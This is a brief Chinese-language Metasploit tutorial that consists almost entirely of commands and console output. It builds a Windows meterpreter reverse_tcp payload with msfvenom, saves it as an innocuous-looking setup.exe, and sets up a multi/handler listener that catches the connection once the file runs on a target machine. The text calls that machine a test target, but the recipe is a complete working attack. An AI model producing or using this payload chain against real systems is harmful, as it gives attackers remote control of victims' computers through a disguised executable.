METASPLOIT配置使用小技巧
msfvenom命令行下服务和端口配置
msf5 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=6666 -f exe > /root/setup.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=6666 -f exe > /root/setup.exe
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.xxx.xxx
LHOST => 192.168.xxx.xxx
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
开始测试靶机。。。
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.xxx.xxx:6666
然后在测试靶机上运行setup.exe。